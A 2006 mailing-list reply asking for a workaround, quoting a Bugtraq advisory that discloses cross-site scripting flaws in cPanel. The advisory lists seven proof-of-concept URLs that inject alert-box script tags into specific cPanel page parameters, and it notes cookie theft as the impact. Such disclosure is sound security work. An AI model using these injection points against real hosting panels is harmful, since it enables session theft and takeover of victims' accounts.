RE: cPanel Multiple Cross Site Scripting Vulnerability

["Hamish Stanaway" <koremeltdown@xxxxxxxxxxx>]

Hi there,

Thank you for finding this vulnerability in a widely used software. I was 
wondering if you had a solution or a work around to this issue?



Kindest of regards,

Hamish Stanaway, CEO

Absolute Web Hosting / -= KoRe WoRkS =- Internet Security
Auckland, New Zealand

http://www.webhosting.net.nz
http://www.buywebhosting.co.nz
http://www.koreworks.com





> From: simo@xxxxxxxx
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: cPanel Multiple Cross Site Scripting Vulnerability
> Date: Fri, 3 Feb 2006 04:31:49 -0000 (GMT)
> MIME-Version: 1.0
> Received: from outgoing.securityfocus.com ([205.206.231.27]) by 
> bay0-mc9-f14.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Fri, 3 
> Feb 2006 08:56:14 -0800
> Received: from outgoing.securityfocus.com by outgoing.securityfocus.com     
>      via smtpd (for mx1.hotmail.com [65.54.245.8]) with ESMTP; Fri, 3 Feb 
> 2006 08:33:09 -0800
> Received: from lists2.securityfocus.com (lists2.securityfocus.com 
> [205.206.231.20])by outgoing3.securityfocus.com (Postfix) with QMQPid 
> 803C22370A5; Fri,  3 Feb 2006 08:16:33 -0700 (MST)
> Received: (qmail 6780 invoked from network); 2 Feb 2006 22:40:44 -0000
> X-Message-Info: JGTYoYF78jGKb+TzrGE6v17OoDzGi89mDti/qOuHBeA=
> Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
> Precedence: bulk
> List-Id: <bugtraq.list-id.securityfocus.com>
> List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
> List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
> List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
> List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
> Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
> Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
> User-Agent: SquirrelMail/1.4.4
> X-AntiAbuse: This header was added to track abuse, please include it with 
> any abuse report
> X-AntiAbuse: Primary Hostname - serveur7.heberjahiz.com
> X-AntiAbuse: Original Domain - securityfocus.com
> X-AntiAbuse: Originator/Caller UID/GID - [32233 502] / [47 12]
> X-AntiAbuse: Sender Address Domain - morx.org
> X-Source: X-Source-Args: X-Source-Dir: Return-Path: 
> bugtraq-return-23195-koremeltdown=hotmail.com@xxxxxxxxxxxxxxxxx
> X-OriginalArrivalTime: 03 Feb 2006 16:56:14.0902 (UTC) 
> FILETIME=[BE6AAD60:01C628E2]
>
> Title: cPanel Multiple Cross Site Scripting
>
> Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
> Discovered: 22 january 2005
> Published: 02 february 2006
> MorX Security Research Team
> http://www.morx.org
>
> Service: Web Hosting Manager
>
> Vendor: cPanel
>
> Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
>
> Severity: Medium/High
>
> Details:
>
> cPanel (control panel) is a graphical web-based management tool, designed
> to make administration of web sites as easy as possible. cPanel handles
> all aspects of website administration in an easy-to-use interface.
> The software, which is proprietary, runs on a number of popular RPM-based
> Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat
> Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly
> accessed on ports 2082 and 2083 (for a SSL version). Authentication is
> either via HTTP or web page login. cPanel is prone to cross-site scripting
> attacks. This problem is due to a failure in the application to properly
> sanitize user-supplied input
>
>
>
> Impact:
>
> an attacker can exploit the vulnerable scripts to have arbitrary script
> code executed in the browser of an authentified cPanel user in the context
> of the website hosting the vulnerable cPanel version. resulting in the
> theft of cookie-based authentication giving the attacker full access to
> the victim's cPanel account as well as other type of attacks.
>
>
> Affected scripts with proof of concept exploit:
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=<script>alert('vul')</script>&domain=
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=<script>alert('vul')</script>&domain=xxx
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0";><script>alert('vul')</script>
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=";><script>alert('vul')</script>
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx";><script>alert('vul')</script>&target=xxx
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006";><script>alert('vul')</script>&domain=xxx&target=xxx
>
> http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan";><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
>
>
> Disclaimer:
>
> this entire document is for eductional, testing and demonstrating purpose
> only. Modification use and/or publishing this information is entirely on
> your OWN risk. The information provided in this advisory is to be
> used/tested on your OWN machine/Account. I cannot be held responsible for
> any of the above.